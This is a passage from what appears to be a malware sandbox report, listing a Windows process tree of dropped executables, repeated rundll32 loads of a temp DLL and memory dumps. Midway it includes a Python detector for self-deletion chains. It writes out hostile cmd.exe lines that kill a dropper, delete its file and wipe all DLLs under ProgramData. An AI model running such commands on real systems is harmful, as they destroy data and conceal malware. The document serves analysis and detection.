                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\3AOCLSnEnkd8HzxfaOU5US1m.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\3AOCLSnEnkd8HzxfaOU5US1m.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\5qKtH6OtfkvZHezumLJCxc3a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\5qKtH6OtfkvZHezumLJCxc3a.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 5qKtH6OtfkvZHezumLJCxc3a.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5qKtH6OtfkvZHezumLJCxc3a.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    13⤵
                • Executes dropped EXE
                PID:4896
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /im 5qKtH6OtfkvZHezumLJCxc3a.exe /f
                13⤵
                • Kills process with taskkill
                PID:6372
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 6
                13⤵
                • Delays execution with timeout.exe
                PID:6656
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c karotima_2.exe
        9⤵
        PID:5192
        • C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\karotima_2.exe
          karotima_2.exe
          10⤵
          PID:5316
          • C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\karotima_2.exe
            "C:\Users\Admin\AppData\Local\Temp\7zS8D1D66E5\karotima_2.exe" -a
            11⤵
            PID:5924
• C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe
  "C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe"
  6⤵
  • Executes dropped EXE
  PID:3968
  • C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im mnh3X3tRdYeXIrv7mpvt_BQQ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe" & del C:\ProgramData\*.dll & exit
    7⤵
    PID:4976
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /im mnh3X3tRdYeXIrv7mpvt_BQQ.exe /f
      8⤵
      • Kills process with taskkill
      PID:5952
    • C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      8⤵
      • Delays execution with timeout.exe
      PID:3232
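The cmd.exe line under PID 3968 is a self-deletion chain: the dropped executable spawns cmd.exe, which kills the parent by image name, waits six seconds with timeout.exe so the image is no longer locked, deletes the parent's own file and then wipes every DLL under C:\ProgramData. The same taskkill / timeout / del sequence appears earlier in the tree for 5qKtH6OtfkvZHezumLJCxc3a.exe. As an added example that is not part of this sandbox report, the following Python flags that pattern in process-creation telemetry: a cmd.exe whose /c line both kills and deletes the image of its own parent process. The event records are constructed here in a Sysmon-like shape (pid, parent pid, image, command line); the record layout, the helper names and the two benign control events are assumptions.

```python
"""Flag the taskkill / timeout / del self-deletion chain in process-creation events.

Added example; the event shape below is an assumption modelled on Sysmon Event ID 1,
not a format taken from the sandbox report.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    pid: int
    parent_pid: int
    image: str          # full path of the created process
    command_line: str


# Target of "taskkill /im <name>" (with or without a leading /f).
TASKKILL_RE = re.compile(r'taskkill\s+(?:/f\s+)?/im\s+"?([^\s"&]+)"?', re.I)
# Target of each "del [/switches] <path>" up to the next "&" or end of line.
DEL_RE = re.compile(r'\bdel\s+(?:/[a-z]\s+)*"?([^"&]+?)"?\s*(?:&|$)', re.I)
TIMEOUT_RE = re.compile(r'\btimeout\s+/t\s+\d+', re.I)


def is_self_deleting_cleanup(command_line: str, parent_image: str) -> bool:
    """True when the command line kills AND deletes the parent's own image name."""
    parent_name = ntpath.basename(parent_image).lower()
    killed = {m.lower() for m in TASKKILL_RE.findall(command_line)}
    deleted = {ntpath.basename(m.strip()).lower() for m in DEL_RE.findall(command_line)}
    return parent_name in killed and parent_name in deleted


def find_self_deletion(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """Return one hit per cmd.exe that performs a self-deletion of its parent."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if ntpath.basename(e.image).lower() != "cmd.exe":
            continue
        parent = by_pid.get(e.parent_pid)
        if parent is None or not is_self_deleting_cleanup(e.command_line, parent.image):
            continue
        hits.append({
            "cmd_pid": e.pid,
            "parent_pid": parent.pid,
            "parent_image": parent.image,
            # The sleep is what lets the file delete succeed after the kill.
            "delayed": bool(TIMEOUT_RE.search(e.command_line)),
            # Any extra paths removed alongside the parent (e.g. dropped DLLs).
            "extra_deletes": [
                m.strip() for m in DEL_RE.findall(e.command_line)
                if ntpath.basename(m.strip()).lower() != ntpath.basename(parent.image).lower()
            ],
        })
    return hits


# Constructed sample events. The first three mirror the chain in the process tree
# above; the remaining four are hypothetical benign controls that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(3968, 1234, r"C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe",
              r'"C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe"'),
    ProcEvent(4976, 3968, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c taskkill /im mnh3X3tRdYeXIrv7mpvt_BQQ.exe /f'
              r' & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\mnh3X3tRdYeXIrv7mpvt_BQQ.exe"'
              r' & del C:\ProgramData\*.dll & exit'),
    ProcEvent(5952, 4976, r"C:\Windows\SysWOW64\taskkill.exe",
              "taskkill /im mnh3X3tRdYeXIrv7mpvt_BQQ.exe /f"),
    # Benign (assumed): an admin script kills a hung app but deletes nothing.
    ProcEvent(7000, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File fix.ps1"),
    ProcEvent(7001, 7000, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c taskkill /im notepad.exe /f & timeout /t 2"),
    # Benign (assumed): an installer deletes its log but kills nothing.
    ProcEvent(7002, 1, r"C:\Users\Admin\AppData\Local\Temp\setup.exe", "setup.exe /S"),
    ProcEvent(7003, 7002, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c del /f /q "C:\Users\Admin\AppData\Local\Temp\setup.log"'),
]


if __name__ == "__main__":
    for hit in find_self_deletion(SAMPLE_EVENTS):
        print(f"self-deletion: cmd.exe {hit['cmd_pid']} removed parent {hit['parent_pid']} "
              f"({hit['parent_image']}); delayed={hit['delayed']}; also deleted {hit['extra_deletes']}")
```

The check keys on the parent relationship rather than on the literal strings, so renamed droppers and different sleep lengths still match, while a script that only kills (or only deletes) does not. The `extra_deletes` field is worth surfacing in the alert: here it records the `C:\ProgramData\*.dll` wipe, which is where to look for helper DLLs that the sample dropped before cleaning up.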
• C:\Users\Admin\Documents\at3ztcFkiIQSPVwUU_U_ZzQS.exe
  "C:\Users\Admin\Documents\at3ztcFkiIQSPVwUU_U_ZzQS.exe"
  6⤵
  • Executes dropped EXE
  PID:2212
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 660
    7⤵
    • Program crash
    PID:4564
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 672
    7⤵
    • Program crash
    PID:2556
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 636
    7⤵
    • Program crash
    PID:1116
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Fznd5k5NOw9yJq5HxPE7NikV.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Fznd5k5NOw9yJq5HxPE7NikV.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\PTjMjuu4LuVvn1_lxplSr5yI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\PTjMjuu4LuVvn1_lxplSr5yI.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\PTjMjuu4LuVvn1_lxplSr5yI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\PTjMjuu4LuVvn1_lxplSr5yI.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\Ny8SF9t70Q0u9JSW4VsQpFJL.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\Ny8SF9t70Q0u9JSW4VsQpFJL.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Ny8SF9t70Q0u9JSW4VsQpFJL.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\Ny8SF9t70Q0u9JSW4VsQpFJL.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\U872b1RMeQy7bk049DSff_jk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\U872b1RMeQy7bk049DSff_jk.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\U872b1RMeQy7bk049DSff_jk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\U872b1RMeQy7bk049DSff_jk.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:416
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\uuVuWlZZct4Z09pBbGF7Ko1R.exe
        "C:\Users\Admin\Documents\uuVuWlZZct4Z09pBbGF7Ko1R.exe"
        6⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:4324
      • C:\Users\Admin\Documents\oHz7YtmmxgXpWTqG0p_f7lrR.exe
        "C:\Users\Admin\Documents\oHz7YtmmxgXpWTqG0p_f7lrR.exe"
        6⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:4496
        • C:\Users\Admin\Documents\oHz7YtmmxgXpWTqG0p_f7lrR.exe
          C:\Users\Admin\Documents\oHz7YtmmxgXpWTqG0p_f7lrR.exe
          7⤵
          • Executes dropped EXE
          PID:4640
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 24
            8⤵
            • Program crash
            PID:4892
      • C:\Users\Admin\Documents\lphQKVaizJSDAPCribyJ3hGe.exe
        "C:\Users\Admin\Documents\lphQKVaizJSDAPCribyJ3hGe.exe"
        6⤵
        • Executes dropped EXE
        PID:3512
        • C:\Users\Admin\Documents\lphQKVaizJSDAPCribyJ3hGe.exe
          "C:\Users\Admin\Documents\lphQKVaizJSDAPCribyJ3hGe.exe" -a
          7⤵
            PID:5224
        • C:\Users\Admin\Documents\8x9Mftqw9DdccZJHuQa5r0_2.exe
          "C:\Users\Admin\Documents\8x9Mftqw9DdccZJHuQa5r0_2.exe"
          6⤵
          • Executes dropped EXE
          PID:4492
          • C:\Users\Admin\AppData\Roaming\2839330.exe
            "C:\Users\Admin\AppData\Roaming\2839330.exe"
            7⤵
              PID:5552
• \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s BITS
  1⤵
  • Suspicious use of SetThreadContext
  • Modifies registry class
  • Suspicious behavior: EnumeratesProcesses
  • Suspicious use of AdjustPrivilegeToken
  • Suspicious use of WriteProcessMemory
  PID:4040
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k SystemNetworkService
    2⤵
    • Checks processor information in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    PID:3676
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  • Suspicious use of WriteProcessMemory
  PID:3772
  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5676
• C:\Windows\system32\browser_broker.exe
  C:\Windows\system32\browser_broker.exe -Embedding
  1⤵
  PID:5412
• C:\Windows\servicing\TrustedInstaller.exe
  C:\Windows\servicing\TrustedInstaller.exe
  1⤵
  • Executes dropped EXE
  • Suspicious use of SetThreadContext
  PID:4544
• \??\c:\windows\system32\svchost.exe
  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
  1⤵
  PID:2480
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:6488
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
      2⤵
      PID:6508
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:6948
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
      2⤵
      PID:5752
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:5380
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
      2⤵
      PID:7516
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:5868
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
      2⤵
      PID:7440
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
  PID:5820
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
      2⤵
      PID:8296
• C:\Windows\system32\rUNdlL32.eXe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  1⤵
  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8332

Network

MITRE ATT&CK Enterprise v6

Downloads

• memory/340-314-0x000001E8EFEB0000-0x000001E8EFF21000-memory.dmp (Filesize: 452KB)
• memory/340-211-0x000001E8EF760000-0x000001E8EF7D1000-memory.dmp (Filesize: 452KB)
• memory/1032-223-0x000001DCEFA60000-0x000001DCEFAD1000-memory.dmp (Filesize: 452KB)
• memory/1032-312-0x000001DCF0140000-0x000001DCF01B1000-memory.dmp (Filesize: 452KB)
• memory/1092-309-0x000001D8485F0000-0x000001D848661000-memory.dmp (Filesize: 452KB)
• memory/1092-222-0x000001D848570000-0x000001D8485E1000-memory.dmp (Filesize: 452KB)
• memory/1276-226-0x0000020FAD340000-0x0000020FAD3B1000-memory.dmp (Filesize: 452KB)
• memory/1276-323-0x0000020FAD3C0000-0x0000020FAD431000-memory.dmp (Filesize: 452KB)
• memory/1344-328-0x000001AFC06B0000-0x000001AFC0721000-memory.dmp (Filesize: 452KB)
• memory/1344-208-0x000001AFC0120000-0x000001AFC0191000-memory.dmp (Filesize: 452KB)
• memory/1436-224-0x000002AD45140000-0x000002AD451B1000-memory.dmp (Filesize: 452KB)
• memory/1436-315-0x000002AD457B0000-0x000002AD45821000-memory.dmp (Filesize: 452KB)
• memory/1900-319-0x0000015957C20000-0x0000015957C91000-memory.dmp (Filesize: 452KB)
• memory/1900-225-0x0000015957BA0000-0x0000015957C11000-memory.dmp (Filesize: 452KB)
• memory/2008-164-0x0000000000150000-0x0000000000151000-memory.dmp (Filesize: 4KB)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2008-166-0x0000000000890000-0x0000000000892000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2024-171-0x0000000000B50000-0x0000000000BED000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    628KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2024-179-0x0000000000400000-0x00000000008F2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4.9MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2088-170-0x0000000000400000-0x0000000000896000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2088-169-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2120-386-0x0000000000400000-0x000000000064F000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2224-233-0x0000000000B10000-0x0000000000B25000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    84KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2360-214-0x000002806CBB0000-0x000002806CC21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2360-318-0x000002806CCA0000-0x000002806CD11000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2368-350-0x0000000000F20000-0x0000000000F21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2368-356-0x0000000005990000-0x0000000005991000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2372-217-0x00000253F9840000-0x00000253F98B1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • memory/2372-304-0x00000253F98C0000-0x00000253F9931000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    452KB

